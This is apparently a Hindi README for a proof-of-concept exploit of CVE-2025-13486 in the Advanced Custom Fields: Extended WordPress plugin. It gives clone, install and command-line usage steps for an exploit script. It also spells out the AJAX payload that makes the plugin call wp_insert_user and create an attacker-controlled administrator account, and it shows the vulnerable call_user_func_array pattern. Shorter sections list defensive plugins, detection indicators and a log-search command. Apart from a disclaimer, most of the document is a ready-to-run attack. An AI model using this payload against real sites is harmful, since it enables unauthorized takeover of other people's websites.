
Advanced Custom Fields Extended (ACFE) WordPress प्लगइन शोषण RCE - एडमिन निर्माण
CVE-2025-13486 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो एडवांस्ड कस्टम फील्ड्स: एक्सटेंडेड (ACFE) वर्डप्रेस प्लगइन में एक गंभीर भेद्यता है जो रिमोट कोड निष्पादन और विशेषाधिकार वृद्धि की अनुमति देती है।
| पहलू | विवरण |
|---|
| CVE ID | CVE-2025-13486 |
| प्लगइन | एडवांस्ड कस्टम फील्ड्स: एक्सटेंडेड (ACFE) |
| प्रकार | रिमोट कोड निष्पादन → विशेषाधिकार वृद्धि |
| जोखिम स्तर | गंभीर |
| प्रभावित संस्करण | ACFE कमजोर संस्करण (विशिष्ट संस्करण निर्धारित किए जाने हैं) |
| CVSS स्कोर | 9.8 क्रिटिकल |
| खोज तिथि | 2025 |
| लेखक | 0xgh057r3c0n |
⚠️ चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।
✅ अनुमत उपयोग:
❌ निषिद्ध उपयोग:
लेखक इस उपकरण के किसी भी दुरुपयोग के लिए उत्तरदायी नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें।
print_r फ़ंक्शन का उपयोग करके भेद्यता की पुष्टिwp_insert_user के माध्यम से प्रशासनिक उपयोगकर्ता निर्माणrequests लाइब्रेरी# रिपॉजिटरी क्लोन करें
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486
# निर्भरताएं इंस्टॉल करें
pip install requests
# वैकल्पिक: requirements.txt से इंस्टॉल करें
pip install -r requirements.txt
# स्क्रिप्ट को निष्पादन योग्य बनाएं (Linux/Mac)
chmod +x exploit.py
एक requirements.txt फ़ाइल बनाएं:
requests>=2.25.1
python3 exploit.py --url <लक्ष्य_URL> [विकल्प]
python3 exploit.py --url http://target.com --verify
python3 exploit.py --url https://target.com
python3 exploit.py --url https://target.com \
--user backup_admin \
--password "P@ssw0rd123!" \
--email [email protected]
python3 exploit.py --url target.com --verify
| विकल्प | विवरण | आवश्यक | डिफ़ॉल्ट |
|---|---|---|---|
-u, --url | लक्ष्य वर्डप्रेस URL | हां | - |
--verify | केवल सत्यापन, कोई शोषण नहीं | नहीं | False |
--user | प्रशासक के लिए कस्टम उपयोगकर्ता नाम | नहीं | admin_XXXXX |
--password | प्रशासक के लिए कस्टम पासवर्ड | नहीं | यादृच्छिक 12 अक्षर |
--email | प्रशासक के लिए कस्टम ईमेल | नहीं | [email protected] |
यह शोषण ACFE प्लगइन के acfe/form/render_form_ajax एंडपॉइंट में अनुचित फ़ंक्शन हैंडलिंग का लाभ उठाता है, जिससे हमलावर मनमाने PHP फ़ंक्शन कॉल कर सकते हैं।
1. URL सत्यापन → HTTP/HTTPS का स्वत: पता लगाना
2. Nonce निष्कर्षण → ACF nonce के लिए पृष्ठ स्कैन करना
3. पेलोड निर्माण → दुर्भावनापूर्ण AJAX अनुरोध बनाना
4. अनुरोध निष्पादन → लक्ष्य पर शोषण भेजना
5. परिणाम विश्लेषण → सफलता संकेतकों की जाँच करना
// ACFE में कमजोर कोड पैटर्न
$result = call_user_func_array($form['render'], array($form));
// शोषण पेलोड संरचना
{
"action": "acfe/form/render_form_ajax",
"nonce": "extracted_nonce",
"form[render]": "wp_insert_user",
"form[user_login]": "attacker_user",
"form[user_pass]": "attacker_pass",
"form[user_email]": "[email protected]",
"form[role]": "administrator"
}
# अनुशंसित सुरक्षा प्लगइन्स
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security
# सर्वर-स्तरीय सुरक्षा
- दर सीमा लागू करें
- mod_security नियम सक्षम करें
- Cloudflare या समान CDN का उपयोग करें
- नियमित सुरक्षा ऑडिट
/wp-admin/admin-ajax.php पर संदिग्ध AJAX अनुरोधaction=acfe/form/render_form_ajax वाले अनुरोधwp_insert_user फ़ंक्शन कॉल# Apache लॉग
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"
# WordPress डिबग लॉग
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)कृपया बग और समस्याओं की रिपोर्ट यहां करें:
CVE-2025-13486/
├── exploit.py # मुख्य शोषण स्क्रिप्ट
├── README.md # यह दस्तावेज़ीकरण
├── requirements.txt # Python निर्भरताएं
├── LICENSE # MIT लाइसेंस फ़ाइल
├── examples/ # उपयोग उदाहरण
│ ├── verification.txt
│ └── exploitation.txt
└── tests/ # परीक्षण स्क्रिप्ट
├── test_verify.py
└── test_exploit.py
0xgh057r3c0n - सुरक्षा शोधकर्ता
यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
सुरक्षा समुदाय के लिए ❤️ से निर्मित
⚠️ जिम्मेदारी और नैतिकता से उपयोग करें ⚠️